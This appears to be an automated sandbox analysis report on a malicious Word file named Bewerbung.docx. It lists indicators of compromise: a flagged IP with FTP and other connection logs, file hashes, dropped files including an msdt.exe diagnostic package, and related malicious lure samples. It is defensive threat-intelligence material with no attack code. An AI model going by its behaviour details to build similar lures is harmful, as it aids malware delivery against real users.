https://sr.outlook.office.net/ws/speech/recognize/assistant/work	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://api.scheduler.	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://my.microsoftpersonalcontent.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://store.office.cn/addinstemplate	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://api.aadrm.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://globaldisco.crm.dynamics.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://messaging.engagement.office.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://dev0-api.acompli.net/autodetect	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://www.odwebp.svc.ms	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://api.diagnosticssdf.office.com/v2/feedback	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://api.powerbi.com/v1.0/myorg/groups	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://web.microsoftstream.com/video/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://api.addins.store.officeppe.com/addinstemplate	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://dataservice.o365filtering.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://learningtools.onenote.com/learningtoolsapi/v2.0/Getvoices	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://ncus.contentsync.	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
http://weather.service.msn.com/data.aspx	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://apis.live.net/v5.0/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://messaging.lifecycle.office.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://management.azure.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://outlook.office365.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://wus2.contentsync.	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://clients.config.office.net/user/v1.0/ios	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://api.office.net	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://incidents.diagnosticssdf.office.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://entitlement.diagnostics.office.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://substrate.office.com/search/api/v2/init	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://outlook.office.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://storage.live.com/clientlogs/uploadlocation	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://outlook.office365.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://webshell.suite.office.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDrive	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://substrate.office.com/search/api/v1/SearchHistory	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://management.azure.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://messaging.lifecycle.office.com/getcustommessage16	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://clients.config.office.net/c2r/v1.0/InteractiveInstallation	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://login.windows.net/common/oauth2/authorize	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://graph.windows.net/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://api.powerbi.com/beta/myorg/imports	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://devnull.onenote.com	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://messaging.action.office.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://ncus.pagecontentsync.	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false	URL Reputation: safe	unknown
https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high
https://messaging.office.com/	E24EF0C9-A590-42E5-86FE-7CD4853FA5C1.0.dr	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
185.27.134.11	unknown	United Kingdom		34119	WILDCARD-ASWildcardUKLimitedGB	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	705530
Start date and time:	2022-09-19 15:39:41 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 54s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Bewerbung.docx
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Run name:	Potential for more IOCs and behavior
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.expl.evad.winDOCX@14/33@0/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Found application associated with file extension: .docx Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, sdiagnhost.exe, BackgroundTransferHost.exe, RuntimeBroker.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
Excluded IPs from analysis (whitelisted): 52.109.76.141, 20.25.84.51, 20.126.106.131, 20.231.69.218, 80.67.82.235, 80.67.82.211
Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, login.live.com, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, raw.githubusercontent.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, a1449.dscg2.akamai.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
185.27.134.11	9t3UoeIMi6.exe	Get hash	malicious	Browse
185.27.134.11	oUw0Yf51fU.exe	Get hash	malicious	Browse

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
WILDCARD-ASWildcardUKLimitedGB	Bewerbung.docx	Get hash	malicious	Browse	185.27.134.11
	QUOTATION-648737.exe	Get hash	malicious	Browse	185.27.134.213
	REQUEST FOR QUOTE (SUPPLIES).exe	Get hash	malicious	Browse	185.27.134.33
	d.vbs	Get hash	malicious	Browse	185.27.133.14
	Nuevo orden_________________.PDF.vbs	Get hash	malicious	Browse	185.27.133.14
	neueva ordesdfdsfdfn009.pdf.vbs	Get hash	malicious	Browse	185.27.133.14
	Medicat_Installer.bat	Get hash	malicious	Browse	31.22.4.101
	Maersk Bill of Lading, Packing List and Commercial Invoice_pdf.vbs	Get hash	malicious	Browse	185.27.134.102
	SWIFT MT103.vbs	Get hash	malicious	Browse	185.27.134.102
	Purchase Order Pricelist & Samples.vbs	Get hash	malicious	Browse	185.27.134.102
	Original Bill of Lading, Packing List and Commercial Invoice .vbs	Get hash	malicious	Browse	185.27.134.102
	SWIFT COPY & ADVICE.vbs	Get hash	malicious	Browse	185.27.134.102
	PO#2022CTV05-47.exe	Get hash	malicious	Browse	185.27.134.102
	Unclear Proforma Invoice.vbs	Get hash	malicious	Browse	185.27.134.153
	EMPLOYEE BENEFITS.html	Get hash	malicious	Browse	31.22.4.93
	poUlN2PnnD	Get hash	malicious	Browse	82.163.179.155
	Smqw34mNlm	Get hash	malicious	Browse	82.163.179.146
	Signed Agreement.html	Get hash	malicious	Browse	31.22.4.93
	9t3UoeIMi6.exe	Get hash	malicious	Browse	185.27.134.11
	IQ5COa42Nm.dll	Get hash	malicious	Browse	31.22.4.160

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Windows\Temp\SDIAG_95d8fc73-225c-4318-a053-73188be49aeb\DiagPackage.dll	nnxPt0Yydv.doc	Get hash	malicious	Browse
	qoIZSkdejM.docx	Get hash	malicious	Browse
	icRTA4gcSe.docx	Get hash	malicious	Browse
	order.docx	Get hash	malicious	Browse
	Court Fine.doc	Get hash	malicious	Browse
	20220714 DWG.doc	Get hash	malicious	Browse
	purchase order.xlsx	Get hash	malicious	Browse
	WF0SlQWKr1.docx	Get hash	malicious	Browse
	V3g2Pfu707.docx	Get hash	malicious	Browse
	5YMh6S8QVr.docx	Get hash	malicious	Browse
	ZDhoKQk8G6.docx	Get hash	malicious	Browse
	TranQuangDai.docx	Get hash	malicious	Browse
	doc782.docx	Get hash	malicious	Browse
	68101181_048154.img	Get hash	malicious	Browse
	doc782.docx	Get hash	malicious	Browse
	doc1712.docx	Get hash	malicious	Browse
	R346ltaP9w.rtf	Get hash	malicious	Browse
	VIP Invitation to Doha Expo 2023.docx	Get hash	malicious	Browse
	WykHEO9BQN.rtf	Get hash	malicious	Browse
	lol666 (2).bat	Get hash	malicious	Browse

Process:	C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
File Type:	Microsoft Access Database
Category:	dropped
Size (bytes):	528384
Entropy (8bit):	0.47601592962080286
Encrypted:	false
SSDEEP:	768:7fXPWoWPL2WiWJWAWcWrWYWrLN2lChHhZfEvy/LI:7f3ChHhlEqTI
MD5:	D5BAA5C199679EDB0CEB52E91B07DCFF
SHA1:	44E8B185BE09A44CD1010606F43A9A145D5D1AF5
SHA-256:	B4DD54945C461B00C85856887786D80B5DB7DEB2B4345C7F6C798A2F9EBE7F88
SHA-512:	7551874B1095BD3B1675B136A12AC56086D59A56BF93644FB57B24FEB81F1866C185A820A06E7C2E897C447F16711C31B3837CAE52A744C0803FF223DB991B7B
Malicious:	false
Preview:	....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...N.T.7J....(....`C;{6...`[.C...3#.y[..\|*..\|.....&.<s..f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.0862223556126716
Encrypted:	false
SSDEEP:	24:etGS99pz1qlkCe745Q7GslPor9cfjvX5ekjV4gztkZfIy6Iv+mzMOBWI+ycuZhN7:6Vpqb927GslP2cfDRjyJI6k1ulWa3yq
MD5:	15EEEEF78D4768D04D1FAE7AFA8D06E4
SHA1:	317D48F22D8E5DD0F2259B93DE12CB342F5B1461
SHA-256:	B2EBF9097AE1240B457AD79A8C2FB2AEC90BD8C046492F83D6E27C26E9270DFA
SHA-512:	D31AB185BE4791814D3CC0F8D1E121CBA56DF0F28C6EA150CFF4AC276D99C39A96EFB82DFDBF4B3940E941E50F9B13147244DB9755163A65DE9B0A5E0FFB843A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....q(c...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....~....F.r...pr...po......(....BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

Process:	C:\Windows\SysWOW64\msdt.exe
File Type:	HTML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	24702
Entropy (8bit):	4.37978533849437
Encrypted:	false
SSDEEP:	96:fO3MDP8m2xaqade1tXv8v/XPSwTkal+7lOaNeHdXQZvczyJuz4UnPz0Kuz+NGTEP:O5NzuCWNaEcU8mjapMVOHW
MD5:	191959B4C3F91BE170B30BF5D1BC2965
SHA1:	1891E3CB588516B94FDC53794DA4DF5469A4C6D0
SHA-256:	8EC3A8F67BAF1E4658FC772F9F35230CA1B0318DDAF7A4C84789A329B6F7F047
SHA-512:	092CC417FBFE7F6E02A60FF169209D7B60362B585CBF92521BFC71C0B378D978DFB9265A3E48C630CE6ABAB263711D71F3917FFAF51B6FD449CFC394E9D8C3A9
Malicious:	false
Preview:	<dcmPS:DiagnosticPackage SchemaVersion="1.0" Localized="true" xmlns:dcmPS="http://www.microsoft.com/schemas/dcm/package/2007" xmlns:dcmRS="http://www.microsoft.com/schemas/dcm/resource/2007">.. <DiagnosticIdentification>.. <ID>PCW</ID>.. <Version>3.0</Version>.. </DiagnosticIdentification>.. <DisplayInformation>.. <Parameters/>.. <Name>@diagpackage.dll,-1</Name>.. <Description>@diagpackage.dll,-2</Description>.. </DisplayInformation>.. <PrivacyLink>https://go.microsoft.com/fwlink/?LinkId=534597</PrivacyLink>.. <PowerShellVersion>2.0</PowerShellVersion>.. <SupportedOSVersion clientSupported="true" serverSupported="true">6.1</SupportedOSVersion>.. <Troubleshooter>.. <Script>.. <Parameters/>.. <ProcessArchitecture>Any</ProcessArchitecture>.. <RequiresElevation>false</RequiresElevation>.. <RequiresInteractivity>true</RequiresInteractivity>.. <FileName>TS_ProgramCompatibilityWizard.ps1</FileName>.. <ExtensionPoint/>.. </Script>..

File type:	Microsoft Word 2007+
Entropy (8bit):	7.950500079961013
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	Bewerbung.docx
File size:	105652
MD5:	e7521cc41970a93d81eb7db063563474
SHA1:	668afe1cf1ff3a6b8b9f9b0ceaa81549944bffc2
SHA256:	d28398402e0b64cfb6e1f8e28cc21584eddd159690c2dab80aafae9c79201ae0
SHA512:	660b372282395fec631a3b83693d5156a71408b59e72b22caa085dca025b11628d718ddae35866b60d29735e68665c28dcf0dcfb66205735b5cd098fab0a8691
SSDEEP:	1536:ysMyD2jAfFGJsCRpyrO4zn+O6dmlBvMT5oqFWIrjQBxwhQflTNJR1Aiaa9340:ysMy63s4pxAMT5oarsBxMQBNJRNFy0
TLSH:	ECA3023F26483EEAD705837A901514F7671880B562042F5AEA738ECCD9D962F3E3B674
File Content Preview:	PK..........!.R(G]t...........[Content_Types].xml ...(.........................................................................................................................................................................................................

Has Summary Info:
Application Name:
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	False

Title:
Subject:
Author:
Keywords:
Template:
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2022-09-16T01:00:00Z
Last Saved Time:	2022-09-16T01:03:00Z
Number of Pages:	1
Number of Words:	3
Number of Characters:	24
Creating Application:
Security:	0

Number of Lines:	1
Number of Paragraphs:	1
Thumbnail Scaling Desired:	false
Company:
Contains Dirty Links:	false
Shared Document:	false
Changed Hyperlinks:	false
Application Version:	16.0000

General
Stream Path:	\x1CompObj
File Type:	data
Stream Size:	77
Entropy:	2.954779533874008
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . F . . . . P B r u s h . . . . . P B r u s h . . . . . P B r u s h . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 0a 00 03 00 00 00 00 00 c0 00 00 00 00 00 00 46 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 07 00 00 00 50 42 72 75 73 68 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1Ole
File Type:	data
Stream Size:	20
Entropy:	0.8475846798245739
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1Ole10Native
File Type:	data
Stream Size:	846852
Entropy:	2.951888117201784
Base64 Encoded:	False
Data ASCII:	. . . B M . . . . . . 6 . . . ( . . . . . . V . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	00 ec 0c 00 42 4d e6 eb 0c 00 00 00 00 00 36 00 00 00 28 00 00 00 d8 01 00 00 56 02 00 00 01 00 18 00 00 00 00 00 b0 eb 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff

General
Stream Path:	\x3ObjInfo
File Type:	data
Stream Size:	6
Entropy:	1.2516291673878228
Base64 Encoded:	False
Data ASCII:	. . . . . .
Data Raw:	00 00 03 00 04 00

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 19, 2022 15:40:42.863996983 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:42.909590006 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:42.909682035 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:42.956911087 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:42.957022905 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:42.964186907 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.009551048 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.009603977 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.009716988 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.024054050 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.085592985 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.085745096 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.147351980 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.193434000 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.193569899 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.243460894 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.243530989 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.245881081 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.291898012 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.291946888 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.292073965 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.292177916 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.366152048 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.366332054 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.373096943 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.419137001 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.419327021 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.423772097 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.469614029 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.469726086 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.470511913 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.516326904 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.516927004 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.516932964 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.563700914 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.563822031 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.564273119 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.610817909 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.610896111 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.610955954 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.611010075 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.611030102 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.611062050 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.611059904 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.611103058 CEST	21	49709	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.611104965 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.611148119 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.611152887 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.611175060 CEST	49709	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.611192942 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.611217976 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.611232042 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:43.611254930 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:43.611290932 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.076782942 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.122600079 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.122833967 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.128467083 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.173953056 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.174249887 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.174992085 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.220525026 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.220746994 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.221657991 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.267335892 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.267678022 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.267774105 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.313391924 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.313651085 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.314100981 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.359648943 CEST	21	49708	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.359880924 CEST	49708	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.362873077 CEST	49710	19273	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.372450113 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.409291983 CEST	19273	49710	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.418384075 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.418508053 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.465708017 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.465821981 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.465914011 CEST	49712	21	192.168.2.4	185.27.134.11
Sep 19, 2022 15:40:44.511471033 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.511527061 CEST	21	49712	185.27.134.11	192.168.2.4
Sep 19, 2022 15:40:44.511642933 CEST	49712	21	192.168.2.4	185.27.134.11
